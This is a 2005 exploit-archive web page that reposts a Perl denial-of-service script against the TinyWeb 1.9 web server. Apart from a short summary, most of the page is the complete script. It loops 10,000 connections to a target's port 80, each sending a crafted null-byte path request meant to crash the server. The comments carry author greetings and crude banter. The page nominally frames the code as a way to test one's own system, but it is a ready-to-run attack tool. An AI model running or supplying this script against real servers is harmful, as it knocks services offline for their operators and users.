首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TinyWeb Server DoS Exploit
来源:vfocus.net 作者:KaraKorsan 发布时间:2005-02-15  

TinyWeb Server DoS Exploit

Summary
TinyWeb is "extremely small (executable file size is 53K), simple (no configuration other than through the command line) and fast (consumes minimum of system resources) Win32 daemon for regular (TCP/http) and secure (SSL/TLS/https) web servers".

A vulnerability in TinyWeb allows remote attackers to cause the server to crash by sending it a special request. The following exploit code can be used to test your system for the mentioned vulnerability.

Credit:
The information has been provided by KaraKorsan Deli.

Details
Exploit:
#TinyWeb version 1.9 DoS Exploit
#Coded bY ++Karak0rsan++
#Usage:perl tiny.pl [target]
#Greetz:Phalaposher,r3d_b4r0n,Hurby,ZzagorR,L4M3R,zeronc,Atak,sloan,fox and
all my friends
# w0rdz: cengiz g t ne sokam senin ehehheh bak exploit yay nlan rsa reziL olacan :D ama #yay nlanmaz belki yay nlansada bo ver nickini s ylemiyom anlamazlar :P okullar a l yo peder benim #bilg. kald r yo ne yapcam ben bilmiyom a.k :) siktiri boktan bi dos exploiti yazd k yolluyoz g venlik
#sitesine :D neyse uzatmayal m "I AM 15 YEARS OLD" ya m z belirtelim :D

$target=$ARGV[0];

if(!$ARGV[0]){
print "TinyWeb version 1.9 DoS Exploit\n";
print "Coded by ++Karak0rsan++\n";
print "Usage:perl tiny.pl [target]\n";
}


use IO::Socket;
$sock = new IO::Socket::INET( PeerAddr => $target,
PeerPort => 80,
Proto => 'tcp',
Type => SOCK_STREAM, );
close($sock);
if($sock){
print "[+]Attacking...\n";
}


$ish=1;

do {
$ish++;
use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $target,
PeerPort => 80,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Didnt Connect,please check your target
address!\n";
print $socket "GET /cgi-bin/.%00./dddd.html HTTP/1.0\r\n";
close($socket);
} while ($ish < 10000);

print "OK ;)\n";
exit();



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Prozilla Format String Vulnera
·vBulletin 3.x forumdisplay.php
·ELOG Remote Shell Exploit
·Linux Kernel <= 2.6.11-rc3
·PHP-Nuke POST Method Admin Var
·Buffer Overflow in OSH
·CA BrightStor ARCserve Discove
·Armagetron DoS
·CA BrightStor ARCserve Backup
·Microsoft Office XP Remote Buf
·Exim 4.x 'spa_base64_to_bits()
·3Com FTP Server Buffer Overflo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved